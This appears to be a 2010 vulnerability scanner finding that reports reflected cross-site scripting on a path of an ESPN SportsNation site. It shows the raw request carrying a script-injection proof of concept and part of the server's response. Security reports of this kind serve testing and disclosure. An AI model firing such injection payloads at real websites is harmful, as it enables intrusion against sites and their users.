1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://sportsnation.espn |
Path: | /groups |
GET /groups?4e759"><script>alert(1)< Host: sportsnation.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 07 Nov 2010 22:11:22 GMT Content-Type: text/html; charset=utf-8 Connection: close ETag: "7301240f85352fe0b54 X-Runtime: 723 Cache-Control: public, max-age=300 Content-Length: 56942 X-Varnish: 2033903467 Age: 0 Via: 1.1 varnish <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>ESPN SportsNat ...[SNIP]... <input type="hidden" name="appRedirect" id="app-redirect" value="http://sports ...[SNIP]... |